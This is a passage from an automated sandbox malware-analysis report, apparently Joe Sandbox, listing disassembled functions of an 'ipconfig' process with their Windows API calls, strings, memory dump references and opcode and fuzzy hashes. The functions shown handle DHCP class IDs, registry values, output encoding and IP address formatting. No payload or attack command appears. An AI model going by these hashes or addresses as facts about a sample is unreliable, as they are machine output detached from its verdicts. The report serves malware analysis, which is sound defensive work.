                                                                                                                              • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00F64DE8
                                                                                                                              • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 00F64DF8
                                                                                                                              • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00F64E16
                                                                                                                              • _fileno.MSVCRT ref: 00F64E23
                                                                                                                              • _write.MSVCRT ref: 00F64E2B
                                                                                                                              • fwprintf.MSVCRT ref: 00F64E3C
                                                                                                                              • fflush.MSVCRT ref: 00F64E46
                                                                                                                              • _fileno.MSVCRT ref: 00F64E4F
                                                                                                                              • _setmode.MSVCRT ref: 00F64E57
                                                                                                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00F64E64
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _fileno$_setmode$ByteCharLocalMultiWidefflush$AllocFree_get_osfhandle_writefwprintfwcschr
                                                                                                                              • String ID: %ls
                                                                                                                              • API String ID: 2233937912-3246610740
                                                                                                                              • Opcode ID: f5386fe49d1b423b8aca122e4cce8259c2f1aac33d11714348551bea3619fde5
                                                                                                                              • Instruction ID: f55ccf8abc4c9b4a9ccdadc5d8da66c0e3c39f924aaf6541114453e2a2622f13
                                                                                                                              • Opcode Fuzzy Hash: f5386fe49d1b423b8aca122e4cce8259c2f1aac33d11714348551bea3619fde5
                                                                                                                              • Instruction Fuzzy Hash: AF319332908219FFEB027BA4EC09FAE7B78EF46329F204156F521E11D1DFB55901AB24
                                                                                                                              Function 00F622FA Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 195registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • memset.MSVCRT ref: 00F62340
                                                                                                                              • ConvertInterfaceLuidToGuid.IPHLPAPI(?,?), ref: 00F623D3
                                                                                                                              • RtlStringFromGUID.NTDLL(?,?), ref: 00F623EC
                                                                                                                              • memcpy.MSVCRT(?,?,00000001), ref: 00F6241A
                                                                                                                              • RtlFreeUnicodeString.NTDLL(?), ref: 00F6243B
                                                                                                                                • Part of subcall function 00F62260: memset.MSVCRT ref: 00F6228A
                                                                                                                                • Part of subcall function 00F62260: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,?,00000000,?,00F62207,?,00000000,SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\,00000200), ref: 00F622DF
                                                                                                                              • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DhcpClassId,00000000,00000001,?,00000000,00000002,?), ref: 00F62491
                                                                                                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00F6249D
                                                                                                                              • memset.MSVCRT ref: 00F624AD
                                                                                                                              • DhcpHandlePnPEvent.DHCPCSVC(00000000,00000001,?,?,00000000), ref: 00F624C9
                                                                                                                                • Part of subcall function 00F65769: __iob_func.MSVCRT ref: 00F6576E
                                                                                                                                • Part of subcall function 00F64E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00F61EB0,00000000,00002908), ref: 00F64E96
                                                                                                                                • Part of subcall function 00F64E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00F61EB0,00000000,00002908), ref: 00F64EAE
                                                                                                                              • RtlFreeUnicodeString.NTDLL(?), ref: 00F62524
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeStringmemset$Unicode$CloseConvertDhcpEventFormatFromGuidHandleInterfaceLocalLuidMessageOpenValue__iob_funcmemcpy
                                                                                                                              • String ID: DhcpClassId$p<Cw
                                                                                                                              • API String ID: 4056406669-1008761339
                                                                                                                              • Opcode ID: 07c9b34ff364817416647e2a4575b45429812506734e041cbd7d8b3c6f19ba1b
                                                                                                                              • Instruction ID: 7406def7cf6a753e49c9ada3b65d8a7e7a0a44341133c4bd05fc38e8a99bbec7
                                                                                                                              • Opcode Fuzzy Hash: 07c9b34ff364817416647e2a4575b45429812506734e041cbd7d8b3c6f19ba1b
                                                                                                                              • Instruction Fuzzy Hash: F561F572E00708AFDB20EB64CC55FAFB3B9EF89710F0440A9E54AE7241DA749E41AF11
                                                                                                                              Function 038A2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                              • Opcode ID: 420b4e6ae55c78b124c356196a730f2f17b147d441e85ca9ecd500b69205fe08
                                                                                                                              • Instruction ID: d648d78daf5132eb9e9bd6d2ed043bf7f62b3bd3a506fcf01e80e19d2c194bb5
                                                                                                                              • Opcode Fuzzy Hash: 420b4e6ae55c78b124c356196a730f2f17b147d441e85ca9ecd500b69205fe08
                                                                                                                              • Instruction Fuzzy Hash: 6751FAB6A0451ABFDB24DBDC899097EF7B8BB0860071885E9E4A5D7741D374DE00C7E0
                                                                                                                              Function 03912410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                              • Opcode ID: d1b21777c9f347bec949a32b625fdd915b413bd6b9897fbb1ac98392bdd73f7e
                                                                                                                              • Instruction ID: 09fc8ec0e4710aa852c7e940cb56ed210cc12d5e79b5ec13dfabff9b401140cb
                                                                                                                              • Opcode Fuzzy Hash: d1b21777c9f347bec949a32b625fdd915b413bd6b9897fbb1ac98392bdd73f7e
                                                                                                                              • Instruction Fuzzy Hash: 36512AB5A006496ECB30EF9CC99097FB7FDDB44240B448CA9E4D6E7685E7B4DA108760
                                                                                                                              Function 00F62C9B Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 184registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ConvertInterfaceLuidToGuid.IPHLPAPI(?,?), ref: 00F62D48
                                                                                                                              • RtlStringFromGUID.NTDLL(?,?), ref: 00F62D5E
                                                                                                                              • memcpy.MSVCRT(?,?,00000050), ref: 00F62D83
                                                                                                                              • RtlFreeUnicodeString.NTDLL(?), ref: 00F62DA2
                                                                                                                                • Part of subcall function 00F62C01: memset.MSVCRT ref: 00F62C2B
                                                                                                                                • Part of subcall function 00F62C01: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,?,00000000,?,00F62BA8,?,00000000,SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\,00000200), ref: 00F62C80
                                                                                                                              • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,Dhcpv6ClassId,00000000,00000001,?,00000000,00000002,?), ref: 00F62DED
                                                                                                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00F62DF6
                                                                                                                              • Dhcpv6SetUserClass.DHCPCSVC6(?,?,?), ref: 00F62E16
                                                                                                                                • Part of subcall function 00F65769: __iob_func.MSVCRT ref: 00F6576E
                                                                                                                                • Part of subcall function 00F64E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00F61EB0,00000000,00002908), ref: 00F64E96
                                                                                                                                • Part of subcall function 00F64E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00F61EB0,00000000,00002908), ref: 00F64EAE
                                                                                                                              • RtlFreeUnicodeString.NTDLL(?), ref: 00F62E6F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeString$Unicode$ClassCloseConvertDhcpv6FormatFromGuidInterfaceLocalLuidMessageOpenUserValue__iob_funcmemcpymemset
                                                                                                                              • String ID: Dhcpv6ClassId$p<Cw
                                                                                                                              • API String ID: 3741014365-218402466
                                                                                                                              • Opcode ID: 7f12cc99544351b82162eb6233bf03211d9acf2ba75c1facd59bb8fc291667e7
                                                                                                                              • Instruction ID: 0f3541ea655a7fb64ca347bd7832ca647f0816af1d4a8a2af54f981a0e99bbe4
                                                                                                                              • Opcode Fuzzy Hash: 7f12cc99544351b82162eb6233bf03211d9acf2ba75c1facd59bb8fc291667e7
                                                                                                                              • Instruction Fuzzy Hash: 83512932E00A089BDF249FA8DC45BAF77B9FF94714F24413EE906E7291DB719801AB50
                                                                                                                              Function 00F64BBC Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 63COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(OutputEncoding,?,00000050,?), ref: 00F64BE2
                                                                                                                              • _wcsicmp.MSVCRT ref: 00F64C03
                                                                                                                              • _wcsicmp.MSVCRT ref: 00F64C1E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _wcsicmp$EnvironmentVariable
                                                                                                                              • String ID: Ansi$OutputEncoding$UTF-8$UTF8$Unicode
                                                                                                                              • API String ID: 198002717-1479523454
                                                                                                                              • Opcode ID: f2415db93f640728c08788676c1ec0ef1a78761ad2e4375d5283e8691ba1eae5
                                                                                                                              • Instruction ID: 5a8f683b76c62f8c42e35d99e292911e1f24bfa71a81efa7ab64046ec2fabbdf
                                                                                                                              • Opcode Fuzzy Hash: f2415db93f640728c08788676c1ec0ef1a78761ad2e4375d5283e8691ba1eae5
                                                                                                                              • Instruction Fuzzy Hash: 0B110A35A0530AAFDF24BB20DC15BA677E8EF45324F24045AF541D2280EBB0E900BA15
                                                                                                                              Function 00F6419B Relevance: 16.7, APIs: 11, Instructions: 165memorynetworkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetComputerNameExW.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000001,?,?), ref: 00F641CF
                                                                                                                              • GetComputerNameExW.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000002,?,?), ref: 00F64212
                                                                                                                              • GetNetworkParams.IPHLPAPI(00000000,?), ref: 00F64249
                                                                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 00F64260
                                                                                                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00F64267
                                                                                                                              • GetNetworkParams.IPHLPAPI(00000000,?), ref: 00F6427F
                                                                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00F642FE
                                                                                                                              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00F64305
                                                                                                                              • DnsQueryConfigAllocEx.DNSAPI(00010003,00000000,00000000), ref: 00F64312
                                                                                                                              • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(0000FDE9,00000000,?,000000FF,?,000000FF), ref: 00F6433D
                                                                                                                              • DnsFreeConfigStructure.DNSAPI(00000000,00010003), ref: 00F64381
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$AllocComputerConfigFreeNameNetworkParamsProcess$ByteCharMultiQueryStructureWide
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3728844974-0
                                                                                                                              • Opcode ID: 74c64a1f17d9bae396dc119fadfc6eb3af8969d5796469648463db8d8e671069
                                                                                                                              • Instruction ID: 524749ed5d84f7b4bacdd16b2208f9b8b95efbb9e71d19697f2b262416746462
                                                                                                                              • Opcode Fuzzy Hash: 74c64a1f17d9bae396dc119fadfc6eb3af8969d5796469648463db8d8e671069
                                                                                                                              • Instruction Fuzzy Hash: A451B472904319BFE7217B60DD8EEAB736CEB54714F100069F525E6192DB74AD80BB20
                                                                                                                              Function 03897630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 038D4725
                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 038D4742
                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 038D46FC
                                                                                                                              • ExecuteOptions, xrefs: 038D46A0
                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 038D4787
                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 038D4655
                                                                                                                              • Execute=1, xrefs: 038D4713
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                              • API String ID: 0-484625025
                                                                                                                              • Opcode ID: 01ab66292536817694293ffb65f3df67fccdd4e5b0e583fec1ac046e18b6ff6c
                                                                                                                              • Instruction ID: c20ef690cde59010d4adec1b7e893b3d4e9b0a6a817c02c68533067d4c37aae3
                                                                                                                              • Opcode Fuzzy Hash: 01ab66292536817694293ffb65f3df67fccdd4e5b0e583fec1ac046e18b6ff6c
                                                                                                                              • Instruction Fuzzy Hash: 9351E83561031D7AFF11EAE9DC89BAD77A8AB45304F0C00DAE605EB181EB709A45CB51
                                                                                                                              Function 00F629AC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ConvertInterfaceLuidToNameW.IPHLPAPI(?,?,00000020), ref: 00F629FD
                                                                                                                              • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000400), ref: 00F62A16
                                                                                                                              • Dhcpv6GetUserClasses.DHCPCSVC6(00000000,?,?,00000000), ref: 00F62A38
                                                                                                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00F62A49
                                                                                                                              • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?), ref: 00F62A54
                                                                                                                              • Dhcpv6GetUserClasses.DHCPCSVC6(00000000,?,?,00000000), ref: 00F62A6E
                                                                                                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00F62AEA
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Local$AllocClassesDhcpv6FreeUser$ConvertInterfaceLuidName
                                                                                                                              • String ID: pFl
                                                                                                                              • API String ID: 1150267431-941757518
                                                                                                                              • Opcode ID: 9da37894dbdf710876869637d2da05b8933d16cf021465eb26acdc0a58c33c1d
                                                                                                                              • Instruction ID: 513a9dc254aff1c98d955e5a0859d39d0d4adc5df85b7027e0ff03e7f7702d7b
                                                                                                                              • Opcode Fuzzy Hash: 9da37894dbdf710876869637d2da05b8933d16cf021465eb26acdc0a58c33c1d
                                                                                                                              • Instruction Fuzzy Hash: 2C418472E00709AFDB11AFE4DD85BAEB778FF54710F140125F905AB281DBB4AC41ABA0
                                                                                                                              Function 00F64C73 Relevance: 13.6, APIs: 9, Instructions: 70COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00F64B41: _fileno.MSVCRT ref: 00F64B4C
                                                                                                                                • Part of subcall function 00F64B41: _get_osfhandle.MSVCRT ref: 00F64B53
                                                                                                                                • Part of subcall function 00F64BBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(OutputEncoding,?,00000050,?), ref: 00F64BE2
                                                                                                                                • Part of subcall function 00F64BBC: _wcsicmp.MSVCRT ref: 00F64C03
                                                                                                                              • fgetpos.MSVCRT ref: 00F64CA8
                                                                                                                              • _fileno.MSVCRT ref: 00F64CC2
                                                                                                                              • _setmode.MSVCRT ref: 00F64CCA
                                                                                                                              • fwprintf.MSVCRT ref: 00F64CD6
                                                                                                                              • fgetpos.MSVCRT ref: 00F64CEF
                                                                                                                              • _fileno.MSVCRT ref: 00F64D09
                                                                                                                              • _setmode.MSVCRT ref: 00F64D11
                                                                                                                              • _fileno.MSVCRT ref: 00F64D21
                                                                                                                              • _write.MSVCRT ref: 00F64D29
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _fileno$_setmodefgetpos$EnvironmentVariable_get_osfhandle_wcsicmp_writefwprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2328354365-0
                                                                                                                              • Opcode ID: 4c21ba27850122aba881083c22fc1ac9d584c658ab012881922903b2d143d8a7
                                                                                                                              • Instruction ID: 1d30b3aec9102dcece8a9b1ebc9ec5d0de89eff1db00219c14036a681836f04c
                                                                                                                              • Opcode Fuzzy Hash: 4c21ba27850122aba881083c22fc1ac9d584c658ab012881922903b2d143d8a7
                                                                                                                              • Instruction Fuzzy Hash: A2113331D45208EFEB15BB64EC0AADDB7B8FF0232CB544456F651D2081EBB4BA01AA95
                                                                                                                              Function 00F64F63 Relevance: 10.6, APIs: 7, Instructions: 105sleepCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,00F657D0,0000000C), ref: 00F64FA0
                                                                                                                              • _amsg_exit.MSVCRT ref: 00F64FB5
                                                                                                                              • _initterm.MSVCRT ref: 00F65009
                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00F65035
                                                                                                                              • exit.MSVCRT ref: 00F6507C
                                                                                                                              • _XcptFilter.MSVCRT ref: 00F6508E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 796493780-0
                                                                                                                              • Opcode ID: fe6e09a888b812c313cbef13afc47481c5fc6f6cdffb93018d6892de65368210
                                                                                                                              • Instruction ID: 4a3fd9fb47beaf242fce8f40e6f3cdcab72523b3d7670b0243a59fb79105a5bb
                                                                                                                              • Opcode Fuzzy Hash: fe6e09a888b812c313cbef13afc47481c5fc6f6cdffb93018d6892de65368210
                                                                                                                              • Instruction Fuzzy Hash: 0831B07190471AEFDB21AF54ED067197BA4FB08B34F10012DE522E77E1DBB19840FA91
                                                                                                                              Function 00F64B41 Relevance: 10.6, APIs: 7, Instructions: 53COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _fileno.MSVCRT ref: 00F64B4C
                                                                                                                              • _get_osfhandle.MSVCRT ref: 00F64B53
                                                                                                                              • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,0000054F,00000000,00002908), ref: 00F64B69
                                                                                                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00F64B75
                                                                                                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00F64B7F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$FileType_fileno_get_osfhandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3475475711-0
                                                                                                                              • Opcode ID: 544c7d3e81b5da93bc2792753ce727b9bfdd678ea36f58a7a896cd5eca68e4aa
                                                                                                                              • Instruction ID: f0dc56591722103054c90522051a03bc56c1e31ffa5f2bdeb874bd3a3e3ea958
                                                                                                                              • Opcode Fuzzy Hash: 544c7d3e81b5da93bc2792753ce727b9bfdd678ea36f58a7a896cd5eca68e4aa
                                                                                                                              • Instruction Fuzzy Hash: 4801A733A08204BF972177B4EC48B2B36ACD7C23B93240661E926C2590EBA0DC007570
                                                                                                                              Function 038AB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __aulldvrm
                                                                                                                              • String ID: +$-$0$0
                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                              • Instruction ID: 09555a9dbf1718687b01f95abb90a2b52bd9c47a2b8ec8bc209ebd1ff7e78cbb
                                                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                              • Instruction Fuzzy Hash: 7B819C70E05A499BFF2ACEECC8917AEBBA5AF45350F1C42D9D861E7391C7748840CB51
                                                                                                                              Function 039120E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                                              • API String ID: 48624451-2819853543
                                                                                                                              • Opcode ID: c243b4d6104162181b35fff15b27aaa4400d8b8b19f1a1740af0f7151f10e297
                                                                                                                              • Instruction ID: a1dc805ad1b99c2421651dec181d09d7c5f6ebaa043c8bd4f77db4fc6c9ed2d1
                                                                                                                              • Opcode Fuzzy Hash: c243b4d6104162181b35fff15b27aaa4400d8b8b19f1a1740af0f7151f10e297
                                                                                                                              • Instruction Fuzzy Hash: D6215376E0021DABDB50EFA9C840AEFB7FCAF54684F080566E945E7200E770D9118BA1
                                                                                                                              Function 00F62003 Relevance: 7.6, APIs: 5, Instructions: 150memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ConvertInterfaceLuidToNameW.IPHLPAPI(?,?,00000020), ref: 00F62054
                                                                                                                              • DhcpEnumClasses.DHCPCSVC(00000000,?,?,00000000), ref: 00F62071
                                                                                                                              • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?), ref: 00F620AC
                                                                                                                              • DhcpEnumClasses.DHCPCSVC(00000000,?,?,00000000), ref: 00F620CC
